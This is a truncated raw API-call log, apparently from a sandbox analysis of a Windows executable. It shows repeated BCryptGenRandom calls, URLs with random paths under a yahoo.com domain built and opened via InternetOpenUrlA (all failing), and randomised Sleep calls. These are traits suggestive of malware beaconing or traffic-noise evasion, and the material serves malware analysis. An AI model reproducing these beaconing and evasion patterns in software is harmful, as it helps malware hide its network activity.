0x7ffc5bcc36b0 [0188.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0188.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0188.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17608, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a17608) returned 0x0 [0188.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0188.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0188.844] GetProcessHeap () returned 0x440000 [0188.844] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0188.844] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x9a\x0eW§s://www.yahoo.com" | out: lpString1="\x9a\x0eW§s://www.yahoo.com") returned="\x9a\x0eW§s://www.yahoo.com" [0188.844] lstrcatA (in: lpString1="\x9a\x0eW§s://www.yahoo.com", lpString2="/u93niseD8YP1ndu86zvrf/yyA1okkyrNSgiYy7g33y3v6fFS31iacj3lg0p5bLWuQhldxy/esdm7VwoTb7pt3bxp/" | out: lpString1="\x9a\x0eW§s://www.yahoo.com/u93niseD8YP1ndu86zvrf/yyA1okkyrNSgiYy7g33y3v6fFS31iacj3lg0p5bLWuQhldxy/esdm7VwoTb7pt3bxp/") returned="\x9a\x0eW§s://www.yahoo.com/u93niseD8YP1ndu86zvrf/yyA1okkyrNSgiYy7g33y3v6fFS31iacj3lg0p5bLWuQhldxy/esdm7VwoTb7pt3bxp/" [0188.845] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0188.845] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x9a\x0eW§s://www.yahoo.com/u93niseD8YP1ndu86zvrf/yyA1okkyrNSgiYy7g33y3v6fFS31iacj3lg0p5bLWuQhldxy/esdm7VwoTb7pt3bxp/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0188.845] GetProcessHeap () returned 0x440000 [0188.845] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0188.845] GetProcessHeap () returned 0x440000 [0188.845] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a175c0 | out: hHeap=0x440000) returned 1 [0188.845] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0188.845] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0188.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0188.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0188.846] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0188.846] Sleep (dwMilliseconds=0x1061d) [0189.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0189.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.078] GetProcessHeap () returned 0x440000 [0189.078] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54f0 [0189.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54f1, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4f54f1) returned 0x0 [0189.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0189.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.083] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.084] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.085] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.087] GetProcessHeap () returned 0x440000 [0189.087] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0189.087] lstrcpyA (in: lpString1=0x473770, lpString2="ðÚ\x0f\x8ds://www.yahoo.com" | out: lpString1="ðÚ\x0f\x8ds://www.yahoo.com") returned="ðÚ\x0f\x8ds://www.yahoo.com" [0189.088] lstrcatA (in: lpString1="ðÚ\x0f\x8ds://www.yahoo.com", lpString2="/r1ZlGTcyzf8s64u8zkLgqbmtfpP26mdmd4p/" | out: lpString1="ðÚ\x0f\x8ds://www.yahoo.com/r1ZlGTcyzf8s64u8zkLgqbmtfpP26mdmd4p/") returned="ðÚ\x0f\x8ds://www.yahoo.com/r1ZlGTcyzf8s64u8zkLgqbmtfpP26mdmd4p/" [0189.088] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0189.088] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ðÚ\x0f\x8ds://www.yahoo.com/r1ZlGTcyzf8s64u8zkLgqbmtfpP26mdmd4p/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0189.088] GetProcessHeap () returned 0x440000 [0189.088] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0189.088] GetProcessHeap () returned 0x440000 [0189.088] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54f0 | out: hHeap=0x440000) returned 1 [0189.088] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0189.089] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0189.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0189.089] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0189.089] Sleep (dwMilliseconds=0x133b2) [0189.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0189.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.257] GetProcessHeap () returned 0x440000 [0189.257] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d6300 [0189.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0189.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6301, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d6301) returned 0x0 [0189.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.259] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.259] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.259] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.259] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0189.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0189.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0189.264] GetProcAddress (hModule=0x7ffc5bcc0000, 